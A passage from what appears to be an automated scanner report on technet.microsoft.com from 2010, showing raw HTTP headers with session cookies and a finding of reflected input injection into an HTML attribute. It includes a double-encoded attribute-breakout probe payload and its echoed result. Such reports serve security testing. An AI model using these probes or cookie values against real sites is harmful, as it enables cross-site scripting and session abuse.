MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2d263"><a>efc03635f13/bb727024" />
...[SNIP]...

2.165. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://technet.microsoft.com
Path:   /en-us/library/bb727024.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c816%2522%253e%253ca%253ed902524dd17 was submitted in the REST URL parameter 3. This input was echoed as 1c816"><a>d902524dd17 in the application's response.

This be